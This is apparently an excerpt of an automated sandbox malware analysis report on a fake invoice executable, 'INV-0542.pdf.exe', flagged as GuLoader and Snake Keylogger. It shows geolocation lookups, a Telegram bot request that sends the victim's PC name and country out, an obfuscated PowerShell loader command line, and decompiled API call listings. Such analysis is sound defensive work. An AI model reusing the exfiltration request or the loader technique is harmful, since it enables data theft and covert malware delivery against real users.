States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49834	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:44:09 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 17:44:09 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:09 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520558 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dr1B3da9qPJY9RqaYfvusM39ZFQH0QdmbkJ9j8YDl%2BFwmpTzNtppvCmJJAlIwGoSlm8lSB9za03T6c64f2pRZYos0LedFXzuCXBsK7RVIbxIjooWNK3iVK036bZCQlrgIhuz%2BDCW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8371f458f4c427-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1898569&cwnd=243&unsent_bytes=0&cid=1d69630042d2c74a&ts=483&x=0"
2024-11-25 17:44:09 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49846	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:44:12 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 17:44:13 UTC	852	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:13 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520562 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wbNNF11gcb4AtlmY2F6kMYvMgnSUXW20NyWsEJqozyKzi9EgB4vluXqWdIRSf%2F0B24XWYeOqcVI%2F%2BeCC2CH4p6si9vMYXqvNoglTpS8e7aGcDSPrXanYeiCyXGjJmQyIN1u%2B0Y3V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e83720a2bbdc439-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4240&recv_bytes=698&delivery_rate=202608&cwnd=207&unsent_bytes=0&cid=80a75bc321c533a4&ts=501&x=0"
2024-11-25 17:44:13 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49853	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:44:16 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 17:44:16 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:16 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520565 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y8DwpzCytlF9tg84f57CpUNY759wcJQ6LDqiO1mIku18BDObsH%2BWsPQ3P4B7nuSoxAXULFf8mehr97arTJ2qTEb103DO4UYGwRVg8%2BRc38xNFvqLk55Lwq24Nvm6vPK0LRU0Lh1M"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e83721f4ebd4364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1773997&cwnd=206&unsent_bytes=0&cid=5afed1da00585f9e&ts=499&x=0"
2024-11-25 17:44:16 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49865	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:44:19 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 17:44:20 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:19 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520568 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NocXw%2F%2FEXqQsEM6Q%2FwUnUYWuEIdnA4Zje57IAIoPDgUFoim72R2P9kjXnOfzZh6ZJ2kozyJWSBbJZ9lmlA2FRhuHJe50gBKhZZ0vJoZ8ozoWRFk7nGLCqcQxyJ2z0PrpYvsGi08P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e837234cc0bc43b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1495&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1862244&cwnd=187&unsent_bytes=0&cid=e77ba6d22d30cb55&ts=492&x=0"
2024-11-25 17:44:20 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49870	149.154.167.220	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:44:21 UTC	345	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-25 17:44:22 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 17:44:22 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 17:44:22 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	12:42:54
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\INV-0542.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\INV-0542.pdf.exe"
Imagebase:	0x400000
File size:	923'768 bytes
MD5 hash:	FA02056B1A21F75EFABDDA81219FB7DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:42:57
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)"
Imagebase:	0x3b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2422857141.0000000009AD2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:42:57
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:43:31
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x8c0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	1376
Total number of Limit Nodes:	37

Executed Functions

Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040353F
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
OleInitialize.OLE32(00000000), ref: 0040365A
SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
CharNextW.USER32(00000000,"C:\Users\user\Desktop\INV-0542.pdf.exe",00000020,"C:\Users\user\Desktop\INV-0542.pdf.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

wsprintfW.USER32 ref: 0040399B
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
DeleteFileW.KERNEL32(0042C800), ref: 004039DA
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08

Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B

CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E

Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A

Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
ExitProcess.KERNEL32 ref: 00403A89
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
ExitProcess.KERNEL32 ref: 00403B33

Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5

Strings

"C:\Users\user\Desktop\INV-0542.pdf.exe", xrefs: 00403694, 0040369A, 004036AF, 0040388D
1033, xrefs: 00403860
\Temp, xrefs: 00403816
SeShutdownPrivilege, xrefs: 00403AC2
C:\Users\user\Desktop, xrefs: 0040395C
NSIS Error, xrefs: 0040367F
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 004037E4, 00403906, 00403953, 00403961
~nsu%X.tmp, xrefs: 00403992
TEMP, xrefs: 00403844
"$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk, xrefs: 00403949
UXTHEME, xrefs: 0040360A, 0040360F, 00403615
Error launching installer, xrefs: 004038E7
TMP, xrefs: 0040384C
C:\Users\user\AppData\Local\Temp\, xrefs: 004037F4, 004037F9, 0040380F, 0040381B, 0040382A, 00403837, 00403843, 0040384B, 00403939, 004039BA, 004039E6, 00403A07, 00403A10
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00403911
Low, xrefs: 00403832

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkk$"C:\Users\user\Desktop\INV-0542.pdf.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2779638779
Opcode ID: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
Opcode Fuzzy Hash: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E

Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405763
GetDlgItem.USER32(?,000003EE), ref: 00405772
GetClientRect.USER32(?,?), ref: 004057AF
GetSystemMetrics.USER32(00000002), ref: 004057B6
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
ShowWindow.USER32(?,00000008), ref: 00405852
GetDlgItem.USER32(?,000003EC), ref: 00405873
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
GetDlgItem.USER32(?,000003F8), ref: 00405781

Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

GetDlgItem.USER32(?,000003EC), ref: 004058C5
CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
CloseHandle.KERNELBASE(00000000), ref: 004058DA
ShowWindow.USER32(00000000), ref: 004058FE
ShowWindow.USER32(?,00000008), ref: 00405903
ShowWindow.USER32(00000008), ref: 0040594D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
CreatePopupMenu.USER32 ref: 00405992
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
GetWindowRect.USER32(?,?), ref: 004059C6
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
OpenClipboard.USER32(00000000), ref: 00405A27
EmptyClipboard.USER32 ref: 00405A2D
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
GlobalLock.KERNEL32(00000000), ref: 00405A43
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
GlobalUnlock.KERNEL32(00000000), ref: 00405A77
SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
CloseClipboard.USER32 ref: 00405A88

Strings

{, xrefs: 0040596B

Memory Dump Source

Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68

Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405C76
lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405CBE
lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INV-0542.pdf.exe"), ref: 00405CE1
